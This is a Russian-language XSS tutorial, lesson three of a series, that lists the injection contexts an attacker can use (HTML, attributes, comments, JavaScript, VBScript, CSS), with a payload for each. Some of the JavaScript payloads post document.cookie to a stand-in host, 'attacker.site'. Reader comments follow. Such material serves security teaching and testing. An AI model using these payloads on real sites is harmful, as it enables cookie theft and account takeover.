Уроки по XSS: Урок 3. Контексты внедрения XSS


Предыдущий урок по XSS «Скрытая передача данных, перехват нажатия клавиш, изменение внешнего вида сайта, подцепление на BeEF, фишинг, подсказки обхода фильтров».

Веб-страница – это всего лишь текст, но браузер не смотрит на неё как на монолитный кусок текста, различные разделы страницы могут быть интерпретированы браузером по-разному: как HTML, CSS или JavaScript.

Как слово ключ в зависимости от используемого контектса может означать музыкальный знак, ключ — от двери, ключ — природный источник воды, ключ — гаечный ключ, ключ — регистрационный номер, вводимый для установки платного программного обеспечения; так и то влияние, которое оказывает пользовательский ввод зависит от контекста, в котором браузер пытается интерпретировать пользовательский ввод. Ниже составлен список различных контекстов, в которых пользовательский ввод может возникнуть на странице.

1) Простой HTML контекст

В теле существующего HTML тэга или в начале и в конце страницы вне тэга <html>.

<некий_html_тэг> пользовательский_ввод </некий_html_тэг>

В этом контексте вы можете в пользовательский ввод вписать валидный HTML любого рода и он немедленно будет воспроизведён браузером.

Например: 

<img src=x onerror=alert(1)>

2) Контекст имени HTML атрибута

Внутри открытого HTML тэга, после имени тэга или после значения атрибута.

<некий_html_тэг пользовательский_ввод имя_некоего_атрибута="некое_значение_атрибута"/>

В этом контексте вы можете ввести имя обработчика событий и код JavaScript следующий за символом = и мы можем иметь исполняемый код, это можно рассматривать как исполнимый контекст.

Например: 

onclick="alert(1)"

3) Контекст значения HTML атрибута

Внутри открытого HTML тэга, после имени атрибута отделённого символом =.

<некий_html_тэг имя_некоего_атрибута="пользовательский_ввод" />

<некий_html_тэг имя_некоего_атрибута='пользовательский_ввод' />

<некий_html_тэг имя_некоего_атрибута=пользовательский_ввод />

Есть три вариации этого контекста

  • Атрибут внутри двойных кавычек
  • Атрибут внутри одинарных кавычек
  • Атрибут без кавычек

Выполнение кода в этом контексте будет зависеть от типа атрибута, в котором появляется ввода. Есть три разных типа атрибутов:

a) Атрибуты события


Это такие атрибуты как onclick, onload и т.д. и значения этих атрибутов выполняются как JavaScript. Поэтому всё здесь – это то же самое, что и  JavaScript контекст.

b) URL атрибуты

Эти атрибуты принимают URL в качестве значения, например, src атрибут различных тэгов. Ввод JavaScript URL здесь может привести к выполнению JavaScript.

Например: 

javascript:some_javascript()

c) Специальные URL атрибуты

Это  URL атрибуты, где ввод обычных URL может привести к проблемам безопасности.

Несколько примеров:

<script src="пользовательский_ввод"

<iframe src="пользовательский_ввод"

<frame src="пользовательский_ввод"

<link href="пользовательский_ввод"

<object data="пользовательский_ввод"

<embed src="пользовательский_ввод"

<form action="пользовательский_ввод"


<button formaction="пользовательский_ввод"

<base href="пользовательский_ввод"

<a href="пользовательский_ввод"

Ввод просто абсолютного http или https URL в этих случаях может оказать эффект на безопасность веб-сайта. В некоторых случаях, если возможно выгружать на сервер контролируемые пользователем данные, тогда даже ввод относительных URL здесь может привести к проблеме. Некоторым сайтам следует очищать http:// и https:// от введённых значений в этих атрибутах для предотвращения вставки здесь абсолютных URL, но есть много способов, которыми могут быть указаны абсолютные URL.

d) Атрибуты тега META

Meta теги, такие как Charset, могут влиять на то, как содержимые страницы интерпретируется браузером. И есть атрибут http-equiv, который может эмулировать поведение заголовков ответа HTTP. Воздействия на значения заголовков вроде Content-Type, Set-Cookie и т.д. будет иметь влияние на безопасность страницы.

e) Обычные атрибуты

Если ввод появляется в значениях обычных атрибутов, то этот контекст должен быть экранирован, чтобы это привело к выполнению кода. Если атрибут в кавычках, то нужно использовать соответствующую кавычку для выхода из контекста. В случае отсутствия в атрибуте кавычек, пробел или обратный слеш должны сделать эту работу. При выходе из контекста можно добавить новый обработчик событий, что приведёт к выполнению кода.

Например: 

" onclick=alert(1)

' onclick=alert(1)

onclick=alert(1)

4) Контекст HTML комментариев

Внутри секции комментариев HTML

<!-- некий_комментарий пользовательский_ввод некий_комментарий -->

Это не исполняемый контекст и требуется выйти из контекста для выполнения кода. Ввод --> завершит этот контекст и переключит весь последующий текст в HTML контекст.


Например: 

--><img src=x onerror=alert(1)>

5) Контекст JavaScript

Внутри раздела страницы JavaScript кода.

<script>

некоторый_javascript

пользовательский_ввод

некоторый_javascript

</script>

Это относится к разделу, заключённому в тэги SCRIPT, в значения атрибутов обработчиков событий и в URL, обрабатывающихся с JavaScript.

Внутри JavaScript пользовательский ввод может появляться в следующих контекстах:

  • a) Контекст кода
  • b) Контекст строки внутри одинарных кавычек
  • c) Контекст строки внутри двойных кавычек
  • d) Контекст комментария в одну строку
  • e) Контекст комментария в несколько строк
  • f) Строки, которые отправляются исполняющим поглотителям

Если пользовательский ввод между тэгами SCRIPT, то не имеет значения, в каком из контекстов он появился, вы можете переключиться на контекст HTML просто включив закрывающий тэг SCRIPT, а затем вставить любой HTML.

Например: 

</script><img src=x onerror=alert(1)>

Если вы не собираетесь переключаться на HTML контекст, тогда вам нужно специально обработать ввод в зависимости от специфичного JavaScript контекста, в котором он появляется.

a) Контекст кода

function dev_func(input) {some_js_code}


dev_func(пользовательский_ввод);

some_variable=123;

Это исполняемый контекст, пользовательский ввод напрямую появляется в выражении и вы можете напрямую ввести элементы JavaScript и они будут выполнены.

Например: 

$.post("http://attacker.site", {'cookie':document.cookie}, function(){})//

b) Контекст строки внутри одинарных кавычек

var some_variable='пользовательский_ввод';

Это не исполняемый контекст и пользовательский ввод должен включать одинарную кавычку в начале для выхода из контекста строки и перехода в контекст кода.

Например:

'; $.post("http://attacker.site", {'cookie':document.cookie}, function(){})//

c) Контекст строки внутри двойных кавычек

var some_variable="пользовательский_ввод";

Это не исполняемый контекст и пользовательский ввод должен включать двойную кавычку в начале для выхода из контекста строки и перехода в контекст кода.

Например: 

"; $.post("http://attacker.site", {'cookie':document.cookie}, function(){})//

d) Контекст команды в одну строку

some_js_func();//пользовательский_ввод

Это не исполняемый контекст и пользовательский ввод должен включать символ новой строки для выхода из контекста комментария строки и переключения в контекст кода.

Например: 

\r\n$.post("http://attacker.site", {'cookie':document.cookie}, function(){})//

e) Контекст многострочного комментария

some_js_func();

/* 

пользовательский_ввод

*/

some_js_code

Это не исполняемый контекст и пользовательский ввод должен включать */ для выхода из контекста многострочного комментария и переключения в контекст кода.

Например: 

*/$.post("http://attacker.site", {'cookie':document.cookie}, function(){})//

f) Строка, предназначенная для исполнителей кода

Эти контекст строк заключённых в кавычки или в двойные кавычки, но важно то, что эти строки передаются функциями или назначаются свойствам, которые будут обработаны как исполняемый код.

Вот несколько примеров:

  • eval("пользовательский_ввод");
  • location = "пользовательский_ввод";
  • setTimeout(1000, "пользовательский_ввод");
  • x.innerHTML = "пользовательский_ввод";

Дополнительные конструкции для исполнения кода смотрите в DOM XSS wiki.

Это должно обрабатываться похожим образом с контекстом кода.

6) Контекст VB Script

В настоящие дни это большая редкость, но всё же вам может встретиться какой-нибудь странный сайт, использующий VBScript.

<script language="vbscript" type="text/vbscript">

some_vbscript

пользовательский_ввод

some_vbscript

</script>

Как JavaScript, вы можете переключиться на контекст HTML тэгом </SCRIPT>.

Внутри VBScript пользовательский ввод может появляться в следующих контекстах:

a) Контекст кода

b) Контекст строки внутри одинарных кавычек

c) Контекст строки внутри двойных кавычек

d) Строки, которые отправляются на исполняющий поглотитель

a) Контекст кода

Похоже на JavaScript эквивалент, вы можете напрямую вводить VBScript

b) Контекст строки внутри одинарных кавычек

VBScript имеет только однострочные комментарии и по аналогии с эквивалентом JavaScript ввод символа новой строки позволит выйти из контекста комментариев и переключиться на контекст кода.

c) Контекст строки внутри двойных кавычек

Похоже на JavaScript эквивалент

d) Строки, которые отправляются на исполняющий поглотитель

Похоже на JavaScript эквивалент

7) CSS Context

Внутри раздела CSS кода страницы.

<style>

some_css

пользовательский_ввод

some_css

</style>

Это относится к разделу, заключённому в теги STYLE, и в значения атрибутов стиля.

Внедрение CSS в страницу само по себе может иметь некоторое воздействие на эту страницу. Например, изменение расположения, видимости, размера и z-index элементов на страницы может сделать для пользователя возможным выполнить действия отличное от предполагаемых.

Но ещё интереснее как JavaScript может быть выполнена внутри CSS. Хотя в современных браузерах это невозможно, более старые поддерживали выполнение JavaScript двумя способами.

i. expression property

expression – это особенность только Internet Explorer, которая позволяла выполнение JavaScript встроенного внутри CSS.

css_selector

{

  property_name: expression(some_javascript);

}

ii. JavaScript URL

Некоторые CSS свойства вроде свойства background-image принимали URL в качестве своих значений. В более старых браузерах вставка здесь JavaScript URL приводила выполнению этого кода JavaScript.

css_selector

{

background-image: javascript:some_javascript()

}

Внутри CSS, пользовательский ввод может появиться в следующих контекстах:

  • a) Контекст оператора
  • b) Контекст строки заключённой в одиночные/двойные кавычки
  • c) Контекст многострочного комментария
  • d) Строки, отправляемые для выполнения

По аналогии с тэгом SCRIPT, если пользовательский ввод между тэгами STYLE, тогда вы можете переключиться на HTML контекст включив закрывающий тэг STYLE и затем вставив любой HTML. 

Например: 

</style><img src=x onerror=alert(1)>

Если вы не собираетесь переключаться на HTML контекст, тогда вам нужно приготовить ввод в зависимости от CSS контекста, в котором он появляется.

a) Контекст оператора

В этом контексте вы можете начать напрямую внедряя CSS для изменения страницы при атаке социальной инженерией или задействовать свойство выражения или метод JavaScript URL для внедрения кода JavaScript.

b) Контекст строки заключённой в одиночные/двойные кавычки

В начале ввода добавьте одиночную или двойную кавычку, чтобы завершить контекст строки и переключиться в контекст оператора.

c) Контекст многострочного комментария

По аналогии с многострочными комментариями в JavaScript ввод */ прекратит контекст комментария и переключит в контекст оператора.

d) Строки, отправляемые для выполнения

Это строки внутри одинарных или двойных кавычек, которые либо передаются в выражение свойства или в свойство, принимающее URL, например, background-image. В обоих случаях, данные внутри контекста строки могут интерпретироваться браузером как JavaScript код.

Источники:


Рекомендуется Вам:

2 комментария to Уроки по XSS: Урок 3. Контексты внедрения XSS

  1. zolton007:

    Не углублялся в остальные, но первый контекст следовало бы разбить на два типа тегов:

    1) Для которых необходимо выйти из контекста тега, чтобы полезная нагрузка могла быть выполнена: TITLE, TEXTAREA, XMP, NOSCRIPT и др.

    2) "Обычные" теги, в которых все отработает как вы написали.

  2. nobody:

    Мир!

    <p>Choose a number between 0 and 100</p>
        <form action="" method="get" name="form">
            <input type="text" id="number" name="number" placeholder="Number">
            <input type="submit" value="Submit">
        </form>
        <br>
        <div id="state"></div>
    </body>

        <script>
        var random = Math.random() * (99);
        var number = '';

     

    Нагрузка срабатывает (алерт показывает), но встаивается в var number='payload'; и видна и в DOM, и в исходнике.

    Нужно ли  выйти из контекста script? Угловые скобки фильтруются.

    Пробовал:  '; - выйти из '', а они (';) - в DOM и в исходнике  var number='';payload';

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *